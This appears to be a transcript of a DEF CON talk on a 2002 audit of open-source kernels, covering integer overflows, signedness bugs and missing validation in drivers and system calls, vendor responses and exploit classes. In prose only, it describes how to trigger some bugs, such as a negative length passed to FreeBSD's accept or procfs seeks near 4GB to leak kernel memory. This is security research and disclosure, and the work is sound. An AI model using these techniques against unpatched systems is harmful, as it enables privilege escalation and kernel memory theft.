 Hello, I'm just going to test the mic and make sure that I have the right distance to the microphone here. So a couple of days ago I presented at Black Hat this same presentation, so I'm going to give it to everyone here today at Def Con. The first thing I said at Black Hat, I suppose, was I wanted to achieve two things and one of those things was not freaking out on stage, and what I hope I don't freak out on stage today, and the second thing was to give people insight into where kernel security stands today and what sort of bugs are present, how many bugs are present, what forms of exploitation are available, and that is what my presentation is on, kernel auditing and exploitation. So there are three parts in today's presentation. At the end of each part we'll stop for questions, but feel free to jump in with any questions if you want to. So the three parts are the auditing research that I performed, a sample of exploitable bugs and exploitation on some of those bugs. So part one is kernel auditing research. So last year, for about three months between July and September 2002, I performed a manual audit of the various open source kernels, and the OSs here were FreeBSD, NetBSD, OpenBSD Analytics. This was a part-time audit, so I wasn't spending 24-7 or even 8 hours a day or anything. It was just spare time that I had available. I just audited various bits of kernel source. So just to give a time frame of how much auditing was done on each kernel, NetBSD was about a little less than a week, FreeBSD a little less than a week also, OpenBSD was a couple of days, and Linux was the rest of my free time. Why did I audit Linux so much? Probably just because I use Linux a lot. I run it on this computer and most of my PCs. So unfortunately Linux was a little heavy-handed in my auditing because I do enjoy Linux. So what prior work has been done on kernel auditing and so forth, there has been some prior work here. Probably the best that I think that I've seen is Dawson Engler's research. In the past couple of years, he has released a number of papers, some really great papers actually, where basically he wrote an automated bug discovery tool using a language called metal, and he released some papers on this, and to do this research he applied this automated bug discovery on large sources, namely being the operating systems kernels. So NetBSD, actually OpenBSD, Linux and FreeBSD, he certainly performed automated bug discovery on, and actually he sent most of those bugs I think to the Linux kernel mailing list, and found a lot of concurrency and synchronization issues such as double locks, double unlocks. That seems to be, he also found a number of buffer overflows, and this was all automated, but most of the bugs that were reported were concurrency and synchronization. The Linux kernel auditing project is an interesting one here. There's a bit of a question mark at the end of this line, and the reason for that is, I've never actually seen the Linux kernel auditing project do anything. They've got a mailing list, but there's very few posts to it. I think they released about two advisories for some issues that were already known, and they never really, like in my opinion, they really didn't audit the Linux kernel. They talked about, possibly let's audit the Linux kernel, but I don't think they actually did because there are places in the kernel source where you just, they have comments saying it's totally broken, please don't use, and these bits of code are totally exploitable. Just some notes for the rest of the presentation. When I'm talking about bugs, I'm always going to be talking about vulnerabilities. Volubilities is a really long word. I'll just say bug, unless I state otherwise. I'll just sort of summarize what happened after the end of these three months of auditing. Think in conjunction with the kernel developers and whatnot, at least 150 bugs were patched, and pretty much all of these were exploitable. So I'm just going to like, it might be there seems to be a lot of bugs in the kernels from what I've seen, but not many people seem to be auditing them, or if they're auditing them, I don't know. So I believe that there are certain myths or a bit of mythology around kernel source, and one of the myths I'm talking about here is that, maybe it's assumed by people that kernels are written by security experts and programming gods, and certainly kernel developers, some kernel developers are exceptionally talented and incredible programmers, but there's a lot of kernel source here, a lot of developers get involved, and so the follow-up to this myth is if the kernels are written by security experts and programming gods, they really mustn't have any security bugs, and if they have security bugs, they're not really simplistic. And I suppose that leads on to the next myth, it's just a rewrite of the first one, is that kernels never have simplistic security bugs. Therefore, only security experts or programming gods can find them, and I would disagree with this considerably, and I show evidence in contradiction to this by showing simple bugs that are exploitable and so forth. I've got one more final myth that, again, a follow-up to the second one, and the first one, that if kernels are buggy, incredibly difficult to exploit, and therefore, probably exploitation is just theoretical. Maybe you've heard that there are bugs, but they require something to be happening while something else is going on, and maybe the disk light is flashing a bit, these types of, these are the myths that I hear and I see, and I try to show evidence to contradict this, because there are simple bugs in the kernel, simple bugs to exploit, there are simple mistakes that are obviously spotable. So I make some conjectures for the auditing that kernel code isn't special, it's just another program, it's a big program, it's a big, big program, but it's just another program. There's certainly a lot of bugs in user land, so why not the kernel as well? And one of the reasons for this is that, I believe this, is that these kernels are written in the same language that the language of C that has had so many problems in the past with user land programs. User land programs generally written in C, lots of bugs, why do people not think the kernel is the same? And certainly, my conjecture is that kernel programmers do make mistakes, just like everyone else. If someone's, an average kernel, say a couple of million lines of code, we're expecting that one million or 10 million lines of code is 100% bug-free, that a simple mistake has an echoed somewhere in this, it takes a long time just to look at five million lines of code, let alone audit every single line there. So I started with a bit of a methodology for the auditing here, that I was only going to audit simple classes of bugs, not going to look though really complicated ways of attacking the kernel. If your disk light is flashing and maybe something is going on in the background and you're paging something, not going to go for any bugs like that, not going to go for any attacks on algorithms or so forth, just target really simple classes of bugs. And one of the ways to do this was to audit using bottom-up techniques. So basically, find places in the code that if were buggy could probably be exploitable, and the way that I do this would be basically to grab for good places and from that, look at the code around it, and if that code is buggy, it's probably exploitable. So looking for good entry points into the kernel, now kernel to user space copies and user space to kernel copies, buffer copies, a very good place to look. If these bits of code are buggy, then certainly buffer overflows and other problems are likely to be exploitable here. As the auditing continued over the period of months, certainly I got more experience in what sort of things I should be looking for and the number of classes of bugs and exploit classes certainly increased. So for example here, system calls are simple entry points. If you look from going to user land to kernel land and exploiting the kernel, system calls under the control of user land maybe they're exploitable. I think though that a lot of people, from what I've heard, if they've gone to audit the kernel, they look at system calls and they think, okay, let's go for the core system calls, maybe there's a bug there. But there's in fact, a lot of other places also that you can audit, such as the device drivers, these again have simple entry points. Primarily for the fact that in Unix everything, really the idea was that everything should be considered a file. So you can access a lot of code, a lot of kernel code through these device drivers, IACTLs seem to do everything. They're so generic, they basically can do anything and everything that you want and probably more, they increase the attack vector space massively. And it's argued that for Unix, everything is a file. What's the point of IACTLs for this? IACTLs break the design of Unix to say that everything is a file by introducing a system call that does everything at this point. So some of the Unix designers argue that that was a bit of a downfall of Unix at that point. I don't think so, it's certainly interesting. So there were some immediate results in the auditing here. The first bug was found within hours and this was true for all systems audited and it's arguable that the first bug in a non-familiar software is, you know, it's arguably the hardest to find. Once you start to have, you know, places to look for and ideas of what types of bugs are present, it's typically considered easier to find more bugs. So a couple of observations here. It does seem to be evidence of varying degrees of code quality and hence security bugs. The core kernel code in all the systems audited was pretty good. Not so many problems there. There were a couple, but, you know, ultimately it seemed to be a lot more bug-free than say, for example, device drivers, which pretty much anyone can write, make a submission for all the OSes here. So they did, in my opinion, seem to contain a large number of bugs. And I also make the comment that bug tends to exhibit signs of propagation and clustering. So what I mean by this is that say, for example, you have a device driver and this device driver, this code for this device driver, it becomes the reference implementation. And this reference implementation has a bug in it. And now everyone, when they go to write their device driver, copies the buggy reference implementation and thus the bug propagates with the security problems associated with it. The clustering observation is also that once you find a bug in a particular bit of source, you're probably more likely to find bugs nearby as well. So if you start to find bugs in, say, the video for Linux drivers, maybe there are more bugs in other video for Linux drivers, maybe in the file system code, look around, probably more bugs around that area as well. And there are identical bugs across all platforms. And I'll show you some examples of this. I've got like the asterix and the bracketed two stuff just in reference to some slides coming up. But just before I get into that, just a bit of research bias, manual auditing is inherently biased. Certainly I can't argue definitively that these observations are scientifically correct because my auditing is inherently biased. Maybe I believe that core kernel code is more secure, hence I'm not finding bugs in that. It's hard to argue through scientific means. However, Dawson Engler's work with the automated bug discovery is less biased since it is not done by a human. It is done by an automated process which can be repeated time and time again and so forth. So just some code in reference to having the same bugs across a number of platforms. We have here NetBSD and OpenBSD. This was a couple of versions ago. And it's a bad example to show you start off, but I should have changed this slide. But because you can't see the exact part where it's exploitable, you can just see part of the bug here. So I've highlighted, I don't think anyone can see this because I can't even see this from here. So basically it's in the I386 set LDT code. We're adding two numbers together, start plus num and checking if it's greater than another. And this is some input validation checks. However, the problem is that when we add these two numbers together, we can get a sign wrap around and with a negative number past this input validation check. And then a couple of lines afterwards, we have a buffer copy which now uses the failed input validation check. These have been fixed since, so they shouldn't be current in any systems. So just to show some evidence in contradiction to the myths that I presented earlier is that kernels aren't written by gods. Very talented, but not in the godly manner that the myth holds them to. So the initial bugs were found in all ours and bugs were found in large quantities. 10 to 30 per day wasn't really uncommon. In various places of the source, lots of bugs are present. And it was assumed and stated that code was secure when in fact it wasn't. This is actually pretty funny to be honest. So this is in Linux 2.4.18 and this is in the video for Linux code I think, one of the drivers for that. So the comment is that, okay, first things first, make sure we don't copy more than we have even if the application wants more. That would be a big security embarrassment with an exclamation mark at the end. The very next line, the exact next line of this comment is an integer overflow. Okay, so about two lines below that is a buffer overflow as a result of the integer overflow. So it's a very interesting comment, certainly. There is another interesting comment. There's a few interesting comments in the code and I'll show some more a bit later on. But for this comment, this routine does error checking to make sure that all memory accesses are within bounds. And then what we have, we have multiple problems in this code. We have an integer, a sign problem. We pass in a sign integer and do a comparison but we don't check for the case when it's less than zero. We also have an integer overflow even if we got this sign problem fix, we would have an integer overflow in the lines below. And then we have a buffer overflow after all of that. So, you know, they're pretty funny comments. I don't know, maybe it's just my bad sense of humor. So some more evidence in contradiction to kernel mythology. Kernels really do have simplistic bugs. You know, I really didn't do any intensive code tracking for this audit. I really, you know, scrapping for simple places, grabbing for good places to look and then from there looking at code immediately above it, I didn't really, you know, I wasn't starting at the, you know, the nit.c or, you know, wherever here. I didn't start at the boot sector and follow it all the way to what happens when you, you know, for just find simple places to audit and look at the immediate code around it. And certainly in some cases, there was simply just no input validation at all. Also inline documentation shows that, you know, code is not working. I should have some examples here. So we have this bit of code, ibcs2underschoolstat.c and this is in all systems actually, OpenBSD, NetBSD, FreeBSD and Linux, the bug was shared across all platforms. FreeBSD have not fixed this. I don't know why. So basically we pass in a length to a syscore. The length is just never validated. We do a, we copy a buffer using this length and there's no, you can put a length of anything. You can, any length you want and it will copy that. So, you know, no input validation at all. Here is another, another no input validation bug. This one is copying from kernel space to user space. So this will give us kernel memory disclosure. And again, it's from a, it's a VGA driver here. So the video driver of some kind looks like to be NetBSD I think. So we're gonna call an IACTL and then we can pass in account of whatever we want. We just pass in a length and it will just copy this back to user space. Okay, here's another bit of code. This one is in Linux and this one is still present in Linux. I released this and an exploit for it a couple of months ago at Ruxcon. And it doesn't seem that, yeah, it hasn't been fixed. So I'm not quite sure what the, what the story is there. So we have a comment and this is in the cough binary loader. Has a comment saying x, x, x, untested. And like, I can really guarantee that it's never been tested because if anyone used this it would kernel panic immediately. It has, it's using the wrong arguments completely. It's, there's no possible way it can work. But in this case it turns out to be, you know, it's exploitable and we can escalate privileges and get a reach shell by running a custom cough binary. So some more evidence in contradiction to kernel mythology. Kernels, if they're buggy, are not always difficult to exploit. To exploit 100% reliably prokfs bugs in Linux to perform memory disclosure is 38 lines. For FreeBSC there's accept system call advisory that was released last year, last year, 37 lines of C. FreeBSC and Linux, the developers of, respective developers both have exploits for these by the way. I did send the exploits that were written to them. Also an interesting thing, a stack overflow in Linux requires no offsets. It's very, very reliable. It assumes correctly that addresses, that return addresses on the stacker word line that's the only assumption it really makes to perform stack overflow in Linux. And in GCC it will always align return addresses. Actually when I presented this at Black Hat a couple of days ago, I was saying that I said exactly the same thing but I didn't want to say 100% certain always will be aligned. So I said GCC should, I'm pretty sure of that, but some guy did come up to me after the presentation and said yes, it's definitely 100% true that GCC will never have anything that isn't word aligned. So it's just a bit of a note there. So what attack vectors are present? At the result of auditing all this code and finding bugs and exploits, it does seem clear that the more code there is that's running the more vulnerable it is likely to be present, which is a pretty casual observation there. But the follow up to that is don't run these kernels that have everything compiled into them under the sun. Don't have support for hardware that you don't use. Don't have a million device drivers just running because all of these increase the attack space that you leave open. So definitely you can mitigate some risks there if you just compile smaller kernels and don't have so much support there for things that you don't use. So entry points into the kernel that use a link and control are certainly the vectors of exploitation here. And device drivers system calls file systems. File systems are interesting. Low code in Linux, PROC FS, in most of all of 2.2 and most of 2.4, I think there's some in the 2.6 tests at the moment and certainly in most of the 2.5s as well. I mean you can do things like lseq, if you can open a file in the PROC FS and it's readable by world, readable by everyone. So you open it, you seek to around four gig on 32 bit platforms, seek to around four gig. And then if you read something that you might be able to cause an integer overflow for around four gig plus what you read, get an integer overflow and then you can have things like memory disclosure. Also just to make one more comment on that last slide is that the core kernel code again is pretty good like in most kernels, not a couple of bugs there, but nothing major there. So I think someone read the slide there with Theodor Ratt just once in three minutes. He just had a bit of laughter. So the vendor response actually was really strong. Contacted everyone and everyone responded extremely well. Theodor Ratt sent an email, turned around, having a conversation with someone, turned back, under three minutes got a response about send a list of 10 to 15 bugs and in three minutes got a response on these. So I think that's not bad. Alan Cox was pretty good. He was the first person that I sent bug reports and vulnerabilities to. Send him a list of bugs for I think 2.2.16 at the time and this was like 2.4. something that wasn't even the latest 2.2 version, some old Linux kernel that no one was really using and in about three hours, a couple of hours, he sent back a list, he sent back information on all of the bugs that I had reported. Some of the bugs he said, oh yeah, we fixed that in later 2.2 or in 2.4. For some, he could actually name the people that had fixed bugs from one to two years earlier saying that our solid designer had fixed various bugs, things for example, such as the get-sock-opset-sock-opt sign problems from two, most of 2.2. So that was pretty impressive, I thought. So just before I get too much into this, I am a little biased myself. I still believe in open-source software. So even though I think the responses that I received were exceptional, it's a little biased there. But maybe the reason why open-source response was so good was that they didn't have a marketing department, I emailed developers directly, people that actually code on these kernels. So maybe the only thing that could argue was source at that point, I don't know. So a bit more biased, I don't know if anyone can see this, but so a bit of a grep for the bit of grep for hack, the number of references of the word hack in the 2.4.19 Linux kernel credits, 106 times, so I don't know. I have a really bad joke, it's a bad joke, I gave it a blackout, no one laughed. It's like a lot of hacks in the Linux kernel, I don't know, no one laughed here again. So. A comedy, not my strong thing here. So just to talk about Linux here, a bit more about each vendor's response. Alan Cox, the first person I contacted, he remained personally involved and responsible for the entire duration, sent tons and tons of bugs, and he fixed the majority of software, patched a lot of things. Often attributed to me in the credits with small patches and whatnot in change logs, and even though these were one to two lines of code and were quite sort of obvious of what needed to be fixed, it was unusual that he attributed me for those. Solid Designer was responsible for the 2.2 Linux kernels, he was the person that was, I think if you look back last year, the 2.2 kernel was released after some long period of time of not releasing another 2.2 kernel, and that was really Solid Designer doing all of that work and back porting a lot of bugs from 2.4 as well. Dave Miller initially started on the Spark, Spark patches and whatnot, and then started to help in sort of generic stuff as well. So, in my opinion, Linux was probably the biggest success here. Certainly, Red Hat released an advisory last year about the 2.4 kernels, 2.4, I think 2.4 or 19 or 18, and they were pretty political in their advisory, referencing the DMCA and saying stuff like, we'd like to give you information on these vulnerabilities, but we can't because maybe the DMCA affects this. So, if you go to another website that's outside the US, you'll be able to see specific information on each of the bugs that were fixed. That was interesting, I thought, but now it seems, excuse me, now it seems that Red Hat, along with most of the other Linux vendors, do release kernel advisories, which seems to be fantastic. They do release regular kernel advisories now. So, it seems probable that this is probably attributed to the auditing work that was done last year. So, in my opinion, that was probably the biggest success story there. The audit, like it's, the irony is that, you know, there was the Linux kernel auditing project, but it seems that, you know, the audit performed last year was probably, probably the most complete for Linux at that time. What about FreeBSD? FreeBSD certainly has a more formalized process with vulnerability disclosure and bug patching and whatnot. They've got a security officer contact point, it took me a bit longer to get like a, you know, reasonable dialogue with them. You know, not, I'm not talking weeks here, but you know, I think it was like a bit less than a week, I think it took me to establish a, you know, really good, you know, really good dialogue there. But they're pretty effective. Wine's dialogue was established. They addressed the standardizations issue, which I haven't really described in my slides, but for one particular point, if we look at Linux 2.2 and if you look at Linux 2.2, there's the Get Sock Hop, Set Sock Hop code. The problem for that was that the socket option length could be a negative, and when it was a negative, it would cause memory disclosure. A very similar problem with FreeBSD, with the accept system call. The length of the socket address structure could be a negative, and when it was, it would cause memory disclosure again. The good thing that FreeBSD did was that they said, okay, let's change this type death for the socket address length to be unsigned, which essentially, you know, in my opinion, will solve problems that they haven't foreseen in the future. Unfortunately, the way that Linux went about fixing that, and it was unfortunate, like in some respects, because there was so many, there was so many specific bugs in the Get Sock Hop code for various protocols and whatnot. What was done was that a check very early on, early on in the code was performed to check for the negative case. It solved lots and lots of problems from hidden subsections of code that had the same sign bug, but my opinion was I would have liked that to be unsigned. So, was FreeBSD a success? They released an advisory last year with the accept system called again, and this was a bit of a surprise. I'm working at a vulnerability company at the time, and a co-worker, happens to be that guy sitting right there, comes up to me and says that he's gonna implement my vulnerability, and I'm like, what vulnerability are you talking about? And he's like, FreeBSD have released an advisory on the accept system call. So, yeah, I don't know, thanks FreeBSD. I really did not know about that, and I saw the advisory, I think I'm bug-tracking like everyone else. So, NetBSD, I didn't speak to NetBSD for too long, but they did resolve all issues. I think what happened with that, it took me about a week before like, I could really talk to, have a good dialogue with someone, and then it was about a week before they actually pushed patches into the main tree, the main development tree at this point. I think what was happening in the second week was that some guy had done the changes, they're very simple changes, done the changes on his own box and was doing a bit of personal QA, and then pushed it for the other developers to look at as well, back in the main unstable development tree, which is very typical in a development process. So, if we look at OpenBSD now, theater rat is probably the quickest response in documented history. Three minutes is, that's pretty fast. I can't get my mom to email me in three minutes. That's insane, it's three minutes. So, interesting thing with OpenBSD though, was that they released an advisory for the select system core, Stack Overflow there. And this was shortly after I sent them about 10 to 15 bugs, and some of these bugs, sent about 10 to 15 bugs, a bit after that they released a select advisory. What I think happened in that period of time was that Niels Provos and probably other people know OpenBSD started, at least a more concerted effort, if not the initial effort, I'm not quite sure to do kernel audits here. So, I think that was reasonably successful that certainly they started to look at other issues then as well. Interesting thing also with NetBSD, which I probably should have mentioned a bit before. I did, when I sent NetBSD a list of problems, some of the bugs were actually shared with OpenBSD as well, which isn't too surprising. The bugs that were shared were primarily just driver code, and that's, again, it's not surprising since OpenBSD can be considered a fork from NetBSD some time ago now, but some of the drivers are shared and some of the bugs were present in both. OpenBSD did take the patches for these things anyway, for NetBSD propagated to OpenBSD pretty quickly, but it was surprising to see the changelogs in OpenBSD because it's like from NetBSD, it's like, oh yeah, those are the integer overflows and the driver problems there and whatnot. So, I've got a couple of, okay, I've got one changelog here from OpenBSD. OpenBSD, there's another good changelog entry, which I probably should have included, but I'll just talk about this one for a sec. So, this is the IVCS2 code that I showed earlier, which had no input validation checking at all, and the comment in the changelog is that more possible integer overflows found. So, there were no integer overflows. It was just a no input validation check. Another interesting changelog entry, and this was for a couple of them, were it was like, I'm just trying to think back to the exact wording here. It was more possible integer overflows found by yada, yada, yada. Some of these are okay, but have been changed for consistency. And in fact, all of these were exploitable. It wasn't, some of these are okay, not, you know, those patches, you know, they're all exploitable. So, you know, it's not, you know, I think OpenBSD, you know, certainly, certainly very good, but it's certainly interesting changelogs as well. So, the IVCS2 stat.c code. Linux fixed it, OpenBSD fixed it, NetBSD fixed it, FreeBSD, I don't know why they've never fixed it. I've sent them, I've sent them this, and they've just not fixed it. I don't know why. I'm really, you know, at a loss to say. And I also explain this at Blackhand, I'll explain it here. The reason why there is a square next to the FreeBSD line is that this actually was a PowerPoint import into OpenOffice, and it didn't have the font for the smiley face. Well, you know, so that's the reason for the square up there. There should have been a smiley face, a frown, a frown, but oh well. So, where are we today in Kernel security? Auditing today, you know, always results in vulnerabilities being found. You know, there are bugs still present in all the kernels. And this isn't surprising, because, you know, auditing and security, you know, really, you know, is or should be an ongoing process. You can't just audit something at some point in time and say it's going to be secure for the, you know, indefinitely. And certainly, you know, even though I will present a number of bugs in a number of bug classes, there's certainly more things that are exploitable and certainly a lot more classes of bugs in the code, as well, than there will just be described today. So, a couple of months ago, presented most of the bugs, a very technical presentation. Like, basically I was going through lists and lists of bugs and saying integer overflow, integer overflow, about four months ago, at Ruxcon, and released some zero-day, released some zero-day at the time. And some of those bugs are still present. I don't know why. So, the cough loader for Linux and exploit is available for that on the Ruxcon website. But I've never actually posted an advisory or posted anything to full disclosure or a bug track or whatever. And, yeah, it's never been fixed. So, an obvious question, does anyone, does anyone read the conference materials? And does anything about it? We're just presenting things for ourselves or what? So, at this point I'm going to pause for audience participation and ask if there are any questions. Okay, I've actually got a pretty interesting question here. Question was that basically when I talked about bugs being clustered, he was asking me if that was because of the way I was auditing. And I suppose my response to that is, I can't really present scientifically that bug clustering exists. All I can say is that I observed, in my opinion, bug clustering and it's possibly supporting evidence. And Dawson Engler's work certainly talks about bug clustering and bug propagation and that's probably certainly more scientific than the methods that I use, which manual auditing. I must admit I did look at certain bits of source and the sources around it in a reasonably closed time frame so maybe that was the reason why I saw bug clustering. But a good question, but okay, I'll go to the next part of the presentation which is a sample of exploitable bugs. And I'm actually gonna, it looks like I'm running really long here so I'm going to actually skip a few of the slides here. Okay, I've got a 10-minute sign up there which is pretty good. I'm going to go through a couple of bugs and go through a couple of classes of a couple ways to exploit them as well. Sample of exploitable bugs. This was, okay, I'll just skip to something that's more interesting. If you wanna, you know, if anyone wants to talk to me about this after the presentation, that's fine. So I'll go to something that's, okay, this one is interesting. What we have here is that we have, and I know that no one can read this so I'll try to explain it. We have a memory allocation and we have memory allocation of something like a size of, a long times, you know, something plus a one. And then down below we have a copy out call which is a kernel buffer copy from kernel space to user space. And the copy out call does something like a size of, a long times, you know, this size thing. And so basically one of the problems that I've seen a lot in programming is that when people are doing things like memory allocations and using one expression to calculate these lengths, and then they're doing buffer copies using these, you know, these other expressions or they're doing input validation checks using one expression and then buffer copies using another expression, typically all ways they lead themselves into problems because you can, many times you can get, you know, the first expression to do, you know, come out with one answer and the second one to come out with something else using integer overflows and whatnot. So that seems to be a problem that exists when you see code like that and they say, okay, they're using one expression here and another expression down below. It's very, very often that it's exploitable in some way. This one, another interesting case. We take a minimum here, a minimum of two values. One of those values we control from a syscall argument. But the point here is that we control a syscall argument and we can make it a negative. So when we take the minimum of these two values here, you know, we're gonna come up with a negative. So then we do a copy out later on using this length which was a negative, now becomes a positive. I got a sign that I have five minutes to go so I'll skip most of these actually and I'll go to some ways to exploit, okay. Here's an example of what I was just talking about a second ago. We have a validation check on this count value here. This is in the PCI hotplug core.seeker which is a Linux code and we seem to have lost one of the, I'll look at this one now. We seem to have, so we do a validation check on this count, okay, and we check if count is less than or equal to zero. But then we do a memory allocation using count plus one. So now we have an integer overflow when we make count the size of uint max, an unsigned integer maximum. We can get count plus one to wrap around back to zero and kmaliking zero bytes will return successful providing we can perform a memory allocation to begin with. Interesting bug that I really do wanna talk about. This is very prevalent in a lot of the 2.2 Linux code and most of the 2.4. This is what I was talking about before when you L-seek to around four gig, we take the file pointer which typically is 64 bits but in some cases people scrap the prototypes and that causes problems and they cast it to a int and then they've had the file pointer which is cast now as 32 bit sign value plus the count which we're reading and that itself is an integer overflow and causes memory disclosure later on. Okay, I'm gonna skip at this point to some... Okay, I won't pause for audience participation and kind of exploitation. So there are two things that are two classes of exploits that we should look at here. Arbitrary code execution and information disclosure. So for arbitrary code execution obviously the best form of exploitation that we have can give us a reach shell, a privilege escalation, escape kernel sandboxing, security enhanced Linux for example, user mode Linux. If we look at digital rights management, save for example we have a certain kernel version or a certain distro that is signed and it says that okay, when you view this website you can't actually save any streaming content or so forth. However, if we have vulnerabilities in this software, we can control it at that point and we can make the software do something else than what the DRM people say it should do. Ultimately in the trusted computing doesn't actually provide any software assurance. Trusted computing is basically just breaking policy at well-defined sequence points and having trust relationships. But if you're trusted in a computing base or so forth is vulnerable or has hidden features then certainly other things are possible there. So and it seems to be the case if your trusted computing base is flawed and certainly in all of these things the kernel is seen as the trusted entity then ultimately system security is compromised. We have information disclosure as well. Such as, such as SSH private keys. If we can read arbitrary kernel memory we might be able to sneak out an SSH private key. I will just pause for one second. Okay, five more minutes and I will be tackled off stage. So I'll try to get in as much as possible here. Has been prior work to kernel exploitation. Nuire in a Frac-60 wrote a great article, great paper on smashing the kernel stack for fun and profit and this was an implementation of exploiting the OpenBSD so that kernel stack overflow. There have been other exploits in the past from Solaris and FreeBSD and whatnot. But in the general case it's seen that there aren't generic ways of attacking the kernel, which was probably a good thing of advice because he showed a class of bugs there. Kernel implementation, all the kernels are written in C. C has known bugs, known problems, known pitfalls, attack the language, attack the implementation, don't attack the algorithms. A very simple method of attack but a very effective one too. C has some pitfalls. I won't talk about these but C has lots of problems and they've been seen time and time again for many, many years now since the 1970s at least. So there are problems in pretty much all code not just user land or kernel code. All code really has the same classes of bugs that people are looking for and all code, we can find bugs in lots and lots of code. I will skip this because I've talked about it earlier on. Okay, so if we look at kernel buffer copies, okay, if we look at kernel buffer copies, okay, we can think of kernel and user space divided into segments. Kernel space is a segment, user space is a segment. When we do a kernel buffer copy, we need to validate the source and destination that they reside in the right segments so that when we're copying something from kernel space to user space, we are in fact copying it from kernel space to user space. We're not putting in values such as 0xc, something, something, something, which represents kernel space to a read or a write system call or so forth. For example here, if we were able to read something from the network and it was possible to put in an address such as 0xc104, whatever, would actually, if there was no validation done, would actually read this data into the kernel segment and overwrite kernel structures or executable code. And if that was the case that we could read into kernel space, then we could certainly exploit the kernel here. Okay, we have a FreeBSD SysExcept exploit here and I just wanted to show this code. It's about 30, 37 or 38 lines, what I said before. And the way to exploit this is pretty straightforward. The accept system call takes three arguments. The first argument is a socket. The second argument is a socket address and the third argument is the socket address link. We simply point the socket address to a user space buffer and then in our socket address link, we pass to it a negative value and I'm just about to get thrown off stage so I'm gonna wrap up right now. Okay, thank you very much everyone. I hope you enjoyed my presentation. I just wanted to say one more thing. If anyone wanted to continue this or have any questions, you can see me outside or right now, somewhere else anyway. But thank you.